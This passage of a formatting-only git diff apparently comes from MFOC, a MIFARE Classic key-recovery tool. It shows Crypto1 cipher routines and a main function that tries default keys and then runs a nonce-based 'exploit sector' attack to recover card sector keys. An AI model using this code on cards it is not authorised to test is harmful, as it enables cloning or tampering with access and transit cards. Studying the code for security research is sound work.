i -= 2) { - s->odd = s->odd << 1 | BIT(key, (i - 1) ^ 7); - s->even = s->even << 1 | BIT(key, i ^ 7); - } - return s; + for (i = 47; s && i > 0; i -= 2) { + s->odd = s->odd << 1 | BIT(key, (i - 1) ^ 7); + s->even = s->even << 1 | BIT(key, i ^ 7); + } + return s; } void crypto1_destroy(struct Crypto1State *state) { - free(state); + free(state); } void crypto1_get_lfsr(struct Crypto1State *state, uint64_t *lfsr) { - int i; - for(*lfsr = 0, i = 23; i >= 0; --i) { - *lfsr = *lfsr << 1 | BIT(state->odd, i ^ 3); - *lfsr = *lfsr << 1 | BIT(state->even, i ^ 3); - } + int i; + for (*lfsr = 0, i = 23; i >= 0; --i) { + *lfsr = *lfsr << 1 | BIT(state->odd, i ^ 3); + *lfsr = *lfsr << 1 | BIT(state->even, i ^ 3); + } } uint8_t crypto1_bit(struct Crypto1State *s, uint8_t in, int is_encrypted) { - uint32_t feedin; - uint8_t ret = filter(s->odd); + uint32_t feedin; + uint8_t ret = filter(s->odd); - feedin = ret & !!is_encrypted; - feedin ^= !!in; - feedin ^= LF_POLY_ODD & s->odd; - feedin ^= LF_POLY_EVEN & s->even; - s->even = s->even << 1 | parity(feedin); + feedin = ret & !!is_encrypted; + feedin ^= !!in; + feedin ^= LF_POLY_ODD & s->odd; + feedin ^= LF_POLY_EVEN & s->even; + s->even = s->even << 1 | parity(feedin); - s->odd ^= (s->odd ^= s->even, s->even ^= s->odd); + s->odd ^= (s->odd ^= s->even, s->even ^= s->odd); - return ret; + return ret; } uint8_t crypto1_byte(struct Crypto1State *s, uint8_t in, int is_encrypted) { - uint8_t i, ret = 0; + uint8_t i, ret = 0; - for (i = 0; i < 8; ++i) - ret |= crypto1_bit(s, BIT(in, i), is_encrypted) << i; + for (i = 0; i < 8; ++i) + ret |= crypto1_bit(s, BIT(in, i), is_encrypted) << i; - return ret; + return ret; } uint32_t crypto1_word(struct Crypto1State *s, uint32_t in, int is_encrypted) { - uint32_t i, ret = 0; + uint32_t i, ret = 0; - for (i = 0; i < 32; ++i) - ret |= crypto1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24); + for (i = 0; i < 32; ++i) + ret |= crypto1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24); - return ret; + return ret; } /* prng_successor @@ -85,9 +84,9 @@ uint32_t crypto1_word(struct Crypto1State *s, uint32_t in, int is_encrypted) */ uint32_t prng_successor(uint32_t x, uint32_t n) { - SWAPENDIAN(x); - while(n--) - x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31; + SWAPENDIAN(x); + while (n--) + x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31; - return SWAPENDIAN(x); + return SWAPENDIAN(x); } diff --git a/src/mfoc.c b/src/mfoc.c index 292b8a1..5906ac2 100644 --- a/src/mfoc.c +++ b/src/mfoc.c @@ -52,926 +52,939 @@ nfc_context *context; -int main(int argc, char * const argv[]) { - const nfc_modulation nm = { - .nmt = NMT_ISO14443A, - .nbr = NBR_106, - }; +int main(int argc, char *const argv[]) +{ + const nfc_modulation nm = { + .nmt = NMT_ISO14443A, + .nbr = NBR_106, + }; - int ch, i, k, n, j, m; - int key, block; - int succeed = 1; + int ch, i, k, n, j, m; + int key, block; + int succeed = 1; - // Exploit sector - int e_sector; - int probes = DEFAULT_PROBES_NR; - int sets = DEFAULT_SETS_NR; + // Exploit sector + int e_sector; + int probes = DEFAULT_PROBES_NR; + int sets = DEFAULT_SETS_NR; - // By default, dump 'A' keys - int dumpKeysA = true; - bool failure = false; - bool skip = false; + // By default, dump 'A' keys + int dumpKeysA = true; + bool failure = false; + bool skip = false; - // Next default key specified as option (-k) - uint8_t * defKeys = NULL, *p; - size_t defKeys_len = 0; + // Next default key specified as option (-k) + uint8_t *defKeys = NULL, *p; + size_t defKeys_len = 0; - // Array with default Mifare Classic keys - uint8_t defaultKeys[][6] = { - {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}, // Default key (first key used by program if no user defined key) - {0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5}, // NFCForum MAD key - {0xd3, 0xf7, 0xd3, 0xf7, 0xd3, 0xf7}, // NFCForum content key - {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, // Blank key - {0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5}, - {0x4d, 0x3a, 0x99, 0xc3, 0x51, 0xdd}, - {0x1a, 0x98, 0x2c, 0x7e, 0x45, 0x9a}, - {0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff}, - {0x71, 0x4c, 0x5c, 0x88, 0x6e, 0x97}, - {0x58, 0x7e, 0xe5, 0xf9, 0x35, 0x0f}, - {0xa0, 0x47, 0x8c, 0xc3, 0x90, 0x91}, - {0x53, 0x3c, 0xb6, 0xc7, 0x23, 0xf6}, - {0x8f, 0xd0, 0xa4, 0xf2, 0x56, 0xe9} + // Array with default Mifare Classic keys + uint8_t defaultKeys[][6] = { + {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}, // Default key (first key used by program if no user defined key) + {0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5}, // NFCForum MAD key + {0xd3, 0xf7, 0xd3, 0xf7, 0xd3, 0xf7}, // NFCForum content key + {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, // Blank key + {0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5}, + {0x4d, 0x3a, 0x99, 0xc3, 0x51, 0xdd}, + {0x1a, 0x98, 0x2c, 0x7e, 0x45, 0x9a}, + {0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff}, + {0x71, 0x4c, 0x5c, 0x88, 0x6e, 0x97}, + {0x58, 0x7e, 0xe5, 0xf9, 0x35, 0x0f}, + {0xa0, 0x47, 0x8c, 0xc3, 0x90, 0x91}, + {0x53, 0x3c, 0xb6, 0xc7, 0x23, 0xf6}, + {0x8f, 0xd0, 0xa4, 0xf2, 0x56, 0xe9} - }; + }; - mftag t; - mfreader r; - denonce d = {NULL, 0, DEFAULT_DIST_NR, DEFAULT_TOLERANCE, {0x00, 0x00, 0x00}}; + mftag t; + mfreader r; + denonce d = {NULL, 0, DEFAULT_DIST_NR, DEFAULT_TOLERANCE, {0x00, 0x00, 0x00}}; - // Pointers to possible keys - pKeys *pk; - countKeys *ck; + // Pointers to possible keys + pKeys *pk; + countKeys *ck; - // Pointer to already broken keys, except defaults - bKeys *bk; + // Pointer to already broken keys, except defaults + bKeys *bk; - static mifare_param mp; - static mifare_classic_tag mtDump; + static mifare_param mp; + static mifare_classic_tag mtDump; - mifare_cmd mc; - FILE *pfDump = NULL; + mifare_cmd mc; + FILE *pfDump = NULL; - // Parse command line arguments - while ((ch = getopt(argc, argv, "hD:s:BP:T:S:O:k:t:")) != -1) { - switch (ch) { - case 'P': - // Number of probes - if (!(probes = atoi(optarg)) || probes < 1) { - ERR ("The number of probes must be a positive number"); - exit (EXIT_FAILURE); - } - // fprintf(stdout, "Number of probes: %d\n", probes); - break; - case 'T': - { - int res; - // Nonce tolerance range - if (((res = atoi(optarg)) < 0)) { - ERR ("The nonce distances range must be a zero or a positive number"); - exit (EXIT_FAILURE); - } - d.tolerance = (uint32_t)res; - // fprintf(stdout, "Tolerance number: %d\n", probes); - } - break; - case 'k': - // Add this key to the default keys - p = realloc(defKeys, defKeys_len + 6); - if (!p) { - ERR ("Cannot allocate memory for defKeys"); - exit (EXIT_FAILURE); - } - defKeys = p; - memset(defKeys+defKeys_len, 0, 6); - num_to_bytes(strtoll(optarg, NULL, 16), 6, defKeys+defKeys_len); - fprintf(stdout, "The custom key 0x%012llx has been added to the default keys\n", bytes_to_num(defKeys+defKeys_len, 6)); - defKeys_len = defKeys_len + 6; + // Parse command line arguments + while ((ch = getopt(argc, argv, "hD:s:BP:T:S:O:k:t:")) != -1) { + switch (ch) { + case 'P': + // Number of probes + if (!(probes = atoi(optarg)) || probes < 1) { + ERR("The number of probes must be a positive number"); + exit(EXIT_FAILURE); + } + // fprintf(stdout, "Number of probes: %d\n", probes); + break; + case 'T': { + int res; + // Nonce tolerance range + if (((res = atoi(optarg)) < 0)) { + ERR("The nonce distances range must be a zero or a positive number"); + exit(EXIT_FAILURE); + } + d.tolerance = (uint32_t)res; + // fprintf(stdout, "Tolerance number: %d\n", probes); + } + break; + case 'k': + // Add this key to the default keys + p = realloc(defKeys, defKeys_len + 6); + if (!p) { + ERR("Cannot allocate memory for defKeys"); + exit(EXIT_FAILURE); + } + defKeys = p; + memset(defKeys + defKeys_len, 0, 6); + num_to_bytes(strtoll(optarg, NULL, 16), 6, defKeys + defKeys_len); + fprintf(stdout, "The custom key 0x%012llx has been added to the default keys\n", bytes_to_num(defKeys + defKeys_len, 6)); + defKeys_len = defKeys_len + 6; - break; - case 'O': - // File output - if (!(pfDump = fopen(optarg, "wb"))) { - fprintf(stderr, "Cannot open: %s, exiting\n", optarg); - exit (EXIT_FAILURE); - } - // fprintf(stdout, "Output file: %s\n", optarg); - break; - case 'h': - usage(stdout, 0); - break; - default: - usage(stderr, 1); - break; - } - } + break; + case 'O': + // File output + if (!(pfDump = fopen(optarg, "wb"))) { + fprintf(stderr, "Cannot open: %s, exiting\n", optarg); + exit(EXIT_FAILURE); + } + // fprintf(stdout, "Output file: %s\n", optarg); + break; + case 'h': + usage(stdout, 0); + break; + default: + usage(stderr, 1); + break; + } + } - if (!pfDump) { - ERR ("parameter -O is mandatory"); - exit (EXIT_FAILURE); - } + if (!pfDump) { + ERR("parameter -O is mandatory"); + exit(EXIT_FAILURE); + } - // Initialize reader/tag structures - mf_init(&r); + // Initialize reader/tag structures + mf_init(&r); - if (nfc_initiator_init (r.pdi) < 0) { - nfc_perror (r.pdi, "nfc_initiator_init"); - goto error; - } - // Drop the field for a while, so can be reset - if (nfc_device_set_property_bool(r.pdi, NP_ACTIVATE_FIELD, true) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool activate field"); - goto error; - } - // Let the reader only try once to find a tag - if (nfc_device_set_property_bool(r.pdi, NP_INFINITE_SELECT, false) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool infinite select"); - goto error; - } - // Configure the CRC and Parity settings - if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool crc"); - goto error; - } - if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true) < 0) { - nfc_perror (r.pdi, "nfc_device_set_property_bool parity"); - goto error; - } + if (nfc_initiator_init(r.pdi) < 0) { + nfc_perror(r.pdi, "nfc_initiator_init"); + goto error; + } + // Drop the field for a while, so can be reset + if (nfc_device_set_property_bool(r.pdi, NP_ACTIVATE_FIELD, true) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool activate field"); + goto error; + } + // Let the reader only try once to find a tag + if (nfc_device_set_property_bool(r.pdi, NP_INFINITE_SELECT, false) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool infinite select"); + goto error; + } + // Configure the CRC and Parity settings + if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool crc"); + goto error; + } + if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true) < 0) { + nfc_perror(r.pdi, "nfc_device_set_property_bool parity"); + goto error; + } -/* - // wait for tag to appear - for (i=0;!nfc_initiator_select_passive_target(r.pdi, nm, NULL, 0, &t.nt) && i < 10; i++) zsleep (100); -*/ + /* + // wait for tag to appear + for (i=0;!nfc_initiator_select_passive_target(r.pdi, nm, NULL, 0, &t.nt) && i < 10; i++) zsleep (100); + */ - // mf_select_tag(r.pdi, &(t.nt)); - if (nfc_initiator_select_passive_target (r.pdi, nm, NULL, 0, &t.nt) < 0) { - nfc_perror (r.pdi, "nfc_initiator_select_passive_target"); - goto error; - } + // mf_select_tag(r.pdi, &(t.nt)); + if (nfc_initiator_select_passive_target(r.pdi, nm, NULL, 0, &t.nt) < 0) { + nfc_perror(r.pdi, "nfc_initiator_select_passive_target"); + goto error; + } - // Test if a compatible MIFARE tag is used - if ((t.nt.nti.nai.btSak & 0x08) == 0) { - ERR ("only Mifare Classic is supported"); - goto error; - } + // Test if a compatible MIFARE tag is used + if ((t.nt.nti.nai.btSak & 0x08) == 0) { + ERR("only Mifare Classic is supported"); + goto error; + } - // Save tag's block size (b4K) - t.b4K = (t.nt.nti.nai.abtAtqa[1] == 0x02); - t.authuid = (uint32_t) bytes_to_num(t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, 4); + // Save tag's block size (b4K) + t.b4K = (t.nt.nti.nai.abtAtqa[1] == 0x02); + t.authuid = (uint32_t) bytes_to_num(t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, 4); - t.num_blocks = (t.b4K) ? 0xff : 0x3f; - t.num_sectors = t.b4K ? NR_TRAILERS_4k : NR_TRAILERS_1k; + t.num_blocks = (t.b4K) ? 0xff : 0x3f; + t.num_sectors = t.b4K ? NR_TRAILERS_4k : NR_TRAILERS_1k; - t.sectors = (void *) calloc(t.num_sectors, sizeof(sector)); - if (t.sectors == NULL) { - ERR ("Cannot allocate memory for t.sectors"); - goto error; - } - if ((pk = (void *) malloc(sizeof(pKeys))) == NULL) { - ERR ("Cannot allocate memory for pk"); - goto error; - } - if ((bk = (void *) malloc(sizeof(bKeys))) == NULL) { - ERR ("Cannot allocate memory for bk"); - goto error; - } else { - bk->brokenKeys = NULL; - bk->size = 0; - } + t.sectors = (void *) calloc(t.num_sectors, sizeof(sector)); + if (t.sectors == NULL) { + ERR("Cannot allocate memory for t.sectors"); + goto error; + } + if ((pk = (void *) malloc(sizeof(pKeys))) == NULL) { + ERR("Cannot allocate memory for pk"); + goto error; + } + if ((bk = (void *) malloc(sizeof(bKeys))) == NULL) { + ERR("Cannot allocate memory for bk"); + goto error; + } else { + bk->brokenKeys = NULL; + bk->size = 0; + } - d.distances = (void *) calloc(d.num_distances, sizeof(uint32_t)); - if (d.distances == NULL) { - ERR ("Cannot allocate memory for t.distances"); - goto error; - } + d.distances = (void *) calloc(d.num_distances, sizeof(uint32_t)); + if (d.distances == NULL) { + ERR("Cannot allocate memory for t.distances"); + goto error; + } - // Initialize t.sectors, keys are not known yet - for (uint8_t s = 0; s < (t.num_sectors); ++s) { - t.sectors[s].foundKeyA = t.sectors[s].foundKeyB = false; - } + // Initialize t.sectors, keys are not known yet + for (uint8_t s = 0; s < (t.num_sectors); ++s) { + t.sectors[s].foundKeyA = t.sectors[s].foundKeyB = false; + } - print_nfc_target (t.nt, true); + print_nfc_target(t.nt, true); - // Try to authenticate to all sectors with default keys - // Set the authentication information (uid) - memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); - // Iterate over all keys (n = number of keys) - n = sizeof(defaultKeys)/sizeof(defaultKeys[0]); - size_t defKey_bytes_todo = defKeys_len; - key = 0; - while (key < n) { - if (defKey_bytes_todo > 0) { - memcpy(mp.mpa.abtKey, defKeys + defKeys_len - defKey_bytes_todo, sizeof(mp.mpa.abtKey)); - defKey_bytes_todo -= sizeof(mp.mpa.abtKey); - } else { - memcpy(mp.mpa.abtKey, defaultKeys[key], sizeof(mp.mpa.abtKey)); - key++; - } - fprintf(stdout, "[Key: %012llx] -> ", bytes_to_num(mp.mpa.abtKey, 6)); - fprintf(stdout, "["); - i = 0; // Sector counter - // Iterate over every block, where we haven't found a key yet - for (block = 0; block <= t.num_blocks; ++block) { - if (trailer_block(block)) { - if (!t.sectors[i].foundKeyA) { - mc = MC_AUTH_A; - if (!nfc_initiator_mifare_cmd(r.pdi,mc,block,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x\n", - // bytes_to_num(mp.mpa.abtKey, 6), i, block); - mf_anticollision(t, r); - } else { - // Save all information about successfull keyA authentization - memcpy(t.sectors[i].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); - t.sectors[i].foundKeyA = true; - } - } - if (!t.sectors[i].foundKeyB) { - mc = MC_AUTH_B; - if (!nfc_initiator_mifare_cmd(r.pdi,mc,block,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key B:%012llx] sector %02x t_block %02x\n", - // bytes_to_num(mp.mpa.abtKey, 6), i, block); - mf_anticollision(t, r); - // No success, try next block - t.sectors[i].trailer = block; - } else { - memcpy(t.sectors[i].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); - t.sectors[i].foundKeyB = true; - } - } - if ((t.sectors[i].foundKeyA) && (t.sectors[i].foundKeyB)) { - fprintf(stdout, "x"); - } else if (t.sectors[i].foundKeyA) { - fprintf(stdout, "/"); - } else if (t.sectors[i].foundKeyB) { - fprintf(stdout, "\\"); - } else { - fprintf(stdout, "."); - } - fflush(stdout); - // fprintf(stdout, "\nSuccess: AUTH [Key %c:%012llx] sector %02x t_block %02x\n", - // (mc == MC_AUTH_A ? 'A' :'B'), bytes_to_num(mp.mpa.abtKey, 6), i, block); - // Save position of a trailer block to sector struct - t.sectors[i++].trailer = block; - } - } - fprintf(stdout, "]\n"); - } + // Try to authenticate to all sectors with default keys + // Set the authentication information (uid) + memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); + // Iterate over all keys (n = number of keys) + n = sizeof(defaultKeys) / sizeof(defaultKeys[0]); + size_t defKey_bytes_todo = defKeys_len; + key = 0; + while (key < n) { + if (defKey_bytes_todo > 0) { + memcpy(mp.mpa.abtKey, defKeys + defKeys_len - defKey_bytes_todo, sizeof(mp.mpa.abtKey)); + defKey_bytes_todo -= sizeof(mp.mpa.abtKey); + } else { + memcpy(mp.mpa.abtKey, defaultKeys[key], sizeof(mp.mpa.abtKey)); + key++; + } + fprintf(stdout, "[Key: %012llx] -> ", bytes_to_num(mp.mpa.abtKey, 6)); + fprintf(stdout, "["); + i = 0; // Sector counter + // Iterate over every block, where we haven't found a key yet + for (block = 0; block <= t.num_blocks; ++block) { + if (trailer_block(block)) { + if (!t.sectors[i].foundKeyA) { + mc = MC_AUTH_A; + if (!nfc_initiator_mifare_cmd(r.pdi, mc, block, &mp)) { + // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x\n", + // bytes_to_num(mp.mpa.abtKey, 6), i, block); + mf_anticollision(t, r); + } else { + // Save all information about successfull keyA authentization + memcpy(t.sectors[i].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); + t.sectors[i].foundKeyA = true; + } + } + if (!t.sectors[i].foundKeyB) { + mc = MC_AUTH_B; + if (!nfc_initiator_mifare_cmd(r.pdi, mc, block, &mp)) { + // fprintf(stdout, "!!Error: AUTH [Key B:%012llx] sector %02x t_block %02x\n", + // bytes_to_num(mp.mpa.abtKey, 6), i, block); + mf_anticollision(t, r); + // No success, try next block + t.sectors[i].trailer = block; + } else { + memcpy(t.sectors[i].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); + t.sectors[i].foundKeyB = true; + } + } + if ((t.sectors[i].foundKeyA) && (t.sectors[i].foundKeyB)) { + fprintf(stdout, "x"); + } else if (t.sectors[i].foundKeyA) { + fprintf(stdout, "/"); + } else if (t.sectors[i].foundKeyB) { + fprintf(stdout, "\\"); + } else { + fprintf(stdout, "."); + } + fflush(stdout); + // fprintf(stdout, "\nSuccess: AUTH [Key %c:%012llx] sector %02x t_block %02x\n", + // (mc == MC_AUTH_A ? 'A' :'B'), bytes_to_num(mp.mpa.abtKey, 6), i, block); + // Save position of a trailer block to sector struct + t.sectors[i++].trailer = block; + } + } + fprintf(stdout, "]\n"); + } - fprintf(stdout, "\n"); - for (i = 0; i < (t.num_sectors); ++i) { - fprintf(stdout, "Sector %02d - %12s ", i, ((t.sectors[i].foundKeyA) ? " FOUND_KEY [A]" : " UNKNOWN_KEY [A]")); - fprintf(stdout, "Sector %02d - %12s ", i, ((t.sectors[i].foundKeyB) ? " FOUND_KEY [B]" : " UNKNOWN_KEY [B]")); - fprintf(stdout, "\n"); - } - fflush(stdout); + fprintf(stdout, "\n"); + for (i = 0; i < (t.num_sectors); ++i) { + fprintf(stdout, "Sector %02d - %12s ", i, ((t.sectors[i].foundKeyA) ? " FOUND_KEY [A]" : " UNKNOWN_KEY [A]")); + fprintf(stdout, "Sector %02d - %12s ", i, ((t.sectors[i].foundKeyB) ? " FOUND_KEY [B]" : " UNKNOWN_KEY [B]")); + fprintf(stdout, "\n"); + } + fflush(stdout); - // Return the first (exploit) sector encrypted with the default key or -1 (we have all keys) - e_sector = find_exploit_sector(t); - //mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd'); // AUTH + Get Distances mode + // Return the first (exploit) sector encrypted with the default key or -1 (we have all keys) + e_sector = find_exploit_sector(t); + //mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd'); // AUTH + Get Distances mode - // Recover key from encrypted sectors, j is a sector counter - for (m = 0; m < 2; ++m) { - if (e_sector == -1) break; // All keys are default, I am skipping recovery mode - for (j = 0; j < (t.num_sectors); ++j) { - memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); - if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { + // Recover key from encrypted sectors, j is a sector counter + for (m = 0; m < 2; ++m) { + if (e_sector == -1) break; // All keys are default, I am skipping recovery mode + for (j = 0; j < (t.num_sectors); ++j) { + memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); + if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { - // First, try already broken keys - skip = false; - for (uint32_t o = 0; o < bk->size; o++) { - num_to_bytes(bk->brokenKeys[o], 6, mp.mpa.abtKey); - mc = dumpKeysA ? 0x60 : 0x61; - if (!nfc_initiator_mifare_cmd(r.pdi,mc,t.sectors[j].trailer,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x, key %d\n", - // bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer, o); - mf_anticollision(t, r); - } else { - // Save all information about successfull authentization - if (dumpKeysA) { - memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); - t.sectors[j].foundKeyA = true; - } else { - memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); - t.sectors[j].foundKeyB = true; - } - printf("Sector: %d, type %c\n", j, (dumpKeysA ? 'A' : 'B')); - fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), - bytes_to_num(mp.mpa.abtKey, 6)); - mf_configure(r.pdi); - mf_anticollision(t, r); - skip = true; - break; - } - } - if (skip) continue; // We have already revealed key, go to the next iteration + // First, try already broken keys + skip = false; + for (uint32_t o = 0; o < bk->size; o++) { + num_to_bytes(bk->brokenKeys[o], 6, mp.mpa.abtKey); + mc = dumpKeysA ? 0x60 : 0x61; + if (!nfc_initiator_mifare_cmd(r.pdi, mc, t.sectors[j].trailer, &mp)) { + // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x, key %d\n", + // bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer, o); + mf_anticollision(t, r); + } else { + // Save all information about successfull authentization + if (dumpKeysA) { + memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); + t.sectors[j].foundKeyA = true; + } else { + memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); + t.sectors[j].foundKeyB = true; + } + printf("Sector: %d, type %c\n", j, (dumpKeysA ? 'A' : 'B')); + fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), + bytes_to_num(mp.mpa.abtKey, 6)); + mf_configure(r.pdi); + mf_anticollision(t, r); + skip = true; + break; + } + } + if (skip) continue; // We have already revealed key, go to the next iteration - // Max probes for auth for each sector - for (k = 0; k < probes; ++k) { - // Try to authenticate to exploit sector and determine distances (filling denonce.distances) - mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd', dumpKeysA); // AUTH + Get Distances mode - printf("Sector: %d, type %c, probe %d, distance %d ", j, (dumpKeysA ? 'A' : 'B'), k, d.median); - // Configure device to the previous state - mf_configure(r.pdi); - mf_anticollision(t, r); + // Max probes for auth for each sector + for (k = 0; k < probes; ++k) { + // Try to authenticate to exploit sector and determine distances (filling denonce.distances) + mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd', dumpKeysA); // AUTH + Get Distances mode + printf("Sector: %d, type %c, probe %d, distance %d ", j, (dumpKeysA ? 'A' : 'B'), k, d.median); + // Configure device to the previous state + mf_configure(r.pdi); + mf_anticollision(t, r); - pk->possibleKeys = NULL; - pk->size = 0; - // We have 'sets' * 32b keystream of potential keys - for (n = 0; n < sets; n++) { - // AUTH + Recovery key mode (for a_sector), repeat 5 times - mf_enhanced_auth(e_sector, t.sectors[j].trailer, t, r, &d, pk, 'r', dumpKeysA); - mf_configure(r.pdi); - mf_anticollision(t, r); - fprintf(stdout, "."); - fflush(stdout); - } - fprintf(stdout, "\n"); - // Get first 15 grouped keys - ck = uniqsort(pk->possibleKeys, pk->size); - for (i = 0; i < TRY_KEYS ; i++) { - // We don't known this key, try to break it - // This key can be found here two or more times - if (ck[i].count > 0) { - // fprintf(stdout,"%d %llx\n",ck[i].count, ck[i].key); - // Set required authetication method - num_to_bytes(ck[i].key, 6, mp.mpa.abtKey); - mc = dumpKeysA ? 0x60 : 0x61; - if (!nfc_initiator_mifare_cmd(r.pdi,mc,t.sectors[j].trailer,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key A:%llx] sector %02x t_block %02x\n", - // bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer); - mf_anticollision(t, r); - } else { - // Save all information about successfull authentization - bk->size++; - bk->brokenKeys = (uint64_t *) realloc((void *)bk->brokenKeys, bk->size * sizeof(uint64_t)); - bk->brokenKeys[bk->size-1] = bytes_to_num(mp.mpa.abtKey, 6); - if (dumpKeysA) { - memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); - t.sectors[j].foundKeyA = true; + pk->possibleKeys = NULL; + pk->size = 0; + // We have 'sets' * 32b keystream of potential keys + for (n = 0; n < sets; n++) { + // AUTH + Recovery key mode (for a_sector), repeat 5 times + mf_enhanced_auth(e_sector, t.sectors[j].trailer, t, r, &d, pk, 'r', dumpKeysA); + mf_configure(r.pdi); + mf_anticollision(t, r); + fprintf(stdout, "."); + fflush(stdout); + } + fprintf(stdout, "\n"); + // Get first 15 grouped keys + ck = uniqsort(pk->possibleKeys, pk->size); + for (i = 0; i < TRY_KEYS ; i++) { + // We don't known this key, try to break it + // This key can be found here two or more times + if (ck[i].count > 0) { + // fprintf(stdout,"%d %llx\n",ck[i].count, ck[i].key); + // Set required authetication method + num_to_bytes(ck[i].key, 6, mp.mpa.abtKey); + mc = dumpKeysA ? 0x60 : 0x61; + if (!nfc_initiator_mifare_cmd(r.pdi, mc, t.sectors[j].trailer, &mp)) { + // fprintf(stdout, "!!Error: AUTH [Key A:%llx] sector %02x t_block %02x\n", + // bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer); + mf_anticollision(t, r); + } else { + // Save all information about successfull authentization + bk->size++; + bk->brokenKeys = (uint64_t *) realloc((void *)bk->brokenKeys, bk->size * sizeof(uint64_t)); + bk->brokenKeys[bk->size - 1] = bytes_to_num(mp.mpa.abtKey, 6); + if (dumpKeysA) { + memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); + t.sectors[j].foundKeyA = true; - } else { - memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); - t.sectors[j].foundKeyB = true; - } - fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), - bytes_to_num(mp.mpa.abtKey, 6)); - mf_configure(r.pdi); - mf_anticollision(t, r); - break; - } - } - } - free(pk->possibleKeys); - free(ck); - // Success, try the next sector - if ((dumpKeysA && t.sectors[j].foundKeyA) || (!dumpKeysA && t.sectors[j].foundKeyB)) break; - } - // We haven't found any key, exiting - if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { - ERR ("No success, maybe you should increase the probes"); - goto error; - } - } - } - dumpKeysA = false; - } + } else { + memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); + t.sectors[j].foundKeyB = true; + } + fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), + bytes_to_num(mp.mpa.abtKey, 6)); + mf_configure(r.pdi); + mf_anticollision(t, r); + break; + } + } + } + free(pk->possibleKeys); + free(ck); + // Success, try the next sector + if ((dumpKeysA && t.sectors[j].foundKeyA) || (!dumpKeysA && t.sectors[j].foundKeyB)) break; + } + // We haven't found any key, exiting + if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { + ERR("No success, maybe you should increase the probes"); + goto error; + } + } + } + dumpKeysA = false; + } - for (i = 0; i < (t.num_sectors); ++i) { - if ((dumpKeysA && 